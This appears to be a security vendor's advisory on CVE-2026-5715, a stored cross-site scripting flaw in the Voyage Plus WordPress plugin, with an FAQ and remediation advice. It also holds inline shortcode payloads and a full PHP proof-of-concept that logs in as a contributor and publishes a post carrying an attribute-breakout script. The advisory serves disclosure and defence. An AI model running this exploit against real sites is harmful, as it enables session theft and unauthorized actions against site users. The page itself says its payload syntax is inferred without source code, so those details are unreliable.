What is CVE-2026-5715?

CVE-2026-5715 is a stored cross-site scripting (XSS) vulnerability in the Voyage Plus WordPress plugin, affecting versions up to and including 1.0.6. It allows authenticated users with contributor-level access to inject arbitrary JavaScript into pages, which can execute when other users view those pages.

How does this vulnerability work?

The vulnerability arises from insufficient input sanitization in the ‘class’ attribute of the ‘post-content’ shortcode. An attacker can craft a shortcode with malicious JavaScript, which is then stored and executed when the affected page is viewed by other users.

Who is affected by this vulnerability?

Any WordPress site using the Voyage Plus plugin version 1.0.6 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to inject malicious scripts.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Voyage Plus plugin installed. If it is version 1.0.6 or earlier, your site is at risk. Additionally, review user roles to identify if any contributors have access to the shortcode.

What is the severity level of this vulnerability?

CVE-2026-5715 has a CVSS score of 6.4, categorized as medium severity. This indicates that while exploitation requires authentication, the potential impact on user sessions and site integrity is significant.

How can I fix this vulnerability?

To mitigate this vulnerability, it is recommended to uninstall the Voyage Plus plugin or remove the vulnerable shortcode from the plugin’s source code. If a patched version becomes available, update to that version as soon as possible.

What mitigation strategies can I employ?

In addition to removing the plugin, you can implement a content security policy (CSP) that restricts script execution. However, this does not eliminate the risk entirely and should be considered a supplementary measure.

What practical risks does this vulnerability pose?

An attacker can execute arbitrary JavaScript in the context of any user visiting an affected page. This could lead to session hijacking, unauthorized actions, or defacement of the site, especially since contributor access is relatively easy to obtain.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can exploit the vulnerability by crafting a shortcode with a malicious payload. It shows how the payload can be injected into the class attribute, leading to script execution when the affected page is viewed.

What are the implications of the CVSS scope change?

The CVSS scope change indicates that the vulnerability affects resources beyond the vulnerable component, impacting the entire WordPress application. This means that the risk extends to all users and their interactions with the site.

Is there a patch available for this vulnerability?

As of now, there is no patched version of the Voyage Plus plugin available. Users are advised to either remove the plugin or take necessary precautions to mitigate the risk until a fix is released.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 15, 2026

CVE-2026-5715: Voyage Plus <= 1.0.6 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'post-content' Shortcode (voyage-plus)

CVE ID CVE-2026-5715

Plugin voyage-plus

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 1.0.6

Patched Version —

Disclosed May 10, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5715 (metadata-based): This vulnerability affects the Voyage Plus WordPress plugin, version 1.0.6 and earlier. It is a stored cross-site scripting (XSS) issue found in the ‘post-content’ shortcode’s ‘class’ attribute. Authenticated users with at least contributor-level privileges can inject arbitrary JavaScript into a page. When other users view that page, the script executes. The CVSS score is 6.4 (Medium), with a network-based attack vector, low complexity, and required authentication.

Root Cause: The plugin registers a shortcode named ‘post-content’ that accepts a ‘class’ attribute. The description and CWE-79 classification indicate the plugin fails to sanitize user-supplied input for the ‘class’ attribute before rendering it in the HTML output. Specifically, the plugin likely concatenates the attribute value directly into a class attribute without using WordPress escaping functions like esc_attr() or sanitize_html_class(). An attacker can break out of the class attribute context by including a double-quote character, then inject arbitrary HTML and JavaScript. Atomic Edge analysis infers this from the vulnerability description; no source code is available for confirmation.

Exploitation: An attacker logs in as a Contributor or higher role. They create or edit a post or page and insert the ‘post-content’ shortcode with a crafted ‘class’ parameter. The attack vector is a post or page edit screen (wp-admin/post-new.php or wp-admin/post.php). The attacker crafts a payload in the shortcode parameter, for example: [post-content class=’x” onclick=”alert(document.cookie)” id=’y’]. When the post renders on the front end, clicking the element executes the injected script. Alternatively, the attacker can inject a script tag directly: [post-content class=’x’ onmouseover=’alert(document.cookie)’]. The injected script executes for any user visiting the page, including administrators. The exact shortcode attribute name and syntax are inferred from the plugin slug and common WordPress shortcode patterns. No AJAX or REST endpoint is required; the vulnerability resides entirely in the shortcode rendering.

Remediation: The plugin developer must properly escape the ‘class’ attribute using WordPress’s esc_attr() function and should validate that the value contains only valid HTML class characters (alphanumeric, hyphen, underscore). Additionally, the plugin should use sanitize_html_class() to strip disallowed characters. Since no patched version is available (and the plugin may be abandoned), site administrators should either uninstall the Voyage Plus plugin or remove the vulnerable shortcode from the plugin source. A content security policy (CSP) with script-src restrictions can mitigate but not eliminate the risk.

Impact: An authenticated attacker with contributor-level access can achieve stored cross-site scripting. This allows the attacker to execute arbitrary JavaScript in the context of any user visiting an affected page. The attacker can steal session cookies, perform actions on behalf of victims (including administrators), redirect users to malicious sites, or deface the WordPress site. Since contributor-level is a low barrier, the attack surface is significant. The CVSS scope change (S:C) indicates the vulnerability impacts resources beyond the vulnerable component, such as the entire WordPress application.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-5715 - Voyage Plus <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'post-content' Shortcode

<?php
/**
 * Proof of Concept: Exploits Stored XSS in Voyage Plus plugin via shortcode attribute.
 * 
 * ASSUMPTIONS:
 * - The attacker has a WordPress account with Contributor privileges.
 * - The Voyage Plus plugin is active. The shortcode is [post-content class="..."].
 * - The target site has a valid user session cookie.
 *
 * USAGE:
 *   php cve-2026-5715-poc.php
 *
 * Edit the variables below before running.
 */

$target_url = 'https://example.com';   // Change to target WordPress URL
$username = 'attacker';                 // Contributor-level username
$password = 'attacker_password';        // Password for above account

// The XSS payload: break out of class attribute and inject event handler
// This payload will trigger an alert with document.cookie when the element is clicked.
$payload = 'x" onclick="alert(document.cookie)" data-x="';

// ---- Begin exploit ----

// Step 1: Login to get cookies
$login_url = rtrim($target_url, '/') . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => rtrim($target_url, '/') . '/wp-admin/',
    'testcookie' => '1'
));
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cve-2026-5715-cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-5715-cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$login_response = curl_exec($ch);
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) !== 302) {
    die("Login failed. Check credentials or target URL.n");
}
curl_close($ch);

// Step 2: Get a nonce and a new post ID for a draft post
$admin_url = rtrim($target_url, '/') . '/wp-admin/post-new.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $admin_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-5715-cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$admin_response = curl_exec($ch);
curl_close($ch);

// Extract _wpnonce and post_id from the admin page
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/i', $admin_response, $nonce_matches);
preg_match('/post=([0-9]+)/', $admin_response, $post_id_matches);

if (empty($nonce_matches[1]) || empty($post_id_matches[1])) {
    die("Could not retrieve nonce or post ID. The site structure may differ.n");
}
$nonce = $nonce_matches[1];
$post_id = $post_id_matches[1];

// Step 3: Save the post with the malicious shortcode
$post_url = rtrim($target_url, '/') . '/wp-admin/post.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $post_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    '_wpnonce' => $nonce,
    'post_ID' => $post_id,
    'post_title' => 'XSS Test Post',
    'content' => '[post-content class="' . $payload . '" /]',
    'post_status' => 'publish',
    'originalaction' => 'editpost',
    'action' => 'editpost'
));
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cve-2026-5715-cookies.txt');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$post_response = curl_exec($ch);
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
    echo "Post saved successfully. Visit the post page to trigger the XSS.n";
    echo "Post URL: " . rtrim($target_url, '/') . "/?p=" . $post_id . "n";
} else {
    echo "Post save may have failed. HTTP code: " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "n";
}
curl_close($ch);

// Clean up
unlink('/tmp/cve-2026-5715-cookies.txt');
?>

Frequently Asked Questions

What is CVE-2026-5715?
Understanding the vulnerability
CVE-2026-5715 is a stored cross-site scripting (XSS) vulnerability in the Voyage Plus WordPress plugin, affecting versions up to and including 1.0.6. It allows authenticated users with contributor-level access to inject arbitrary JavaScript into pages, which can execute when other users view those pages.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization in the ‘class’ attribute of the ‘post-content’ shortcode. An attacker can craft a shortcode with malicious JavaScript, which is then stored and executed when the affected page is viewed by other users.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the Voyage Plus plugin version 1.0.6 or earlier is at risk. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability to inject malicious scripts.
How can I check if my site is vulnerable?
Assessing your WordPress installation
To determine if your site is vulnerable, check the version of the Voyage Plus plugin installed. If it is version 1.0.6 or earlier, your site is at risk. Additionally, review user roles to identify if any contributors have access to the shortcode.
What is the severity level of this vulnerability?
Understanding the CVSS score
CVE-2026-5715 has a CVSS score of 6.4, categorized as medium severity. This indicates that while exploitation requires authentication, the potential impact on user sessions and site integrity is significant.
How can I fix this vulnerability?
Remediation steps
To mitigate this vulnerability, it is recommended to uninstall the Voyage Plus plugin or remove the vulnerable shortcode from the plugin’s source code. If a patched version becomes available, update to that version as soon as possible.
What mitigation strategies can I employ?
Additional protective measures
In addition to removing the plugin, you can implement a content security policy (CSP) that restricts script execution. However, this does not eliminate the risk entirely and should be considered a supplementary measure.
What practical risks does this vulnerability pose?
Potential impact on users
An attacker can execute arbitrary JavaScript in the context of any user visiting an affected page. This could lead to session hijacking, unauthorized actions, or defacement of the site, especially since contributor access is relatively easy to obtain.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can exploit the vulnerability by crafting a shortcode with a malicious payload. It shows how the payload can be injected into the class attribute, leading to script execution when the affected page is viewed.
What are the implications of the CVSS scope change?
Broader impact assessment
The CVSS scope change indicates that the vulnerability affects resources beyond the vulnerable component, impacting the entire WordPress application. This means that the risk extends to all users and their interactions with the site.
Is there a patch available for this vulnerability?
Current status of the plugin
As of now, there is no patched version of the Voyage Plus plugin available. Users are advised to either remove the plugin or take necessary precautions to mitigate the risk until a fix is released.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations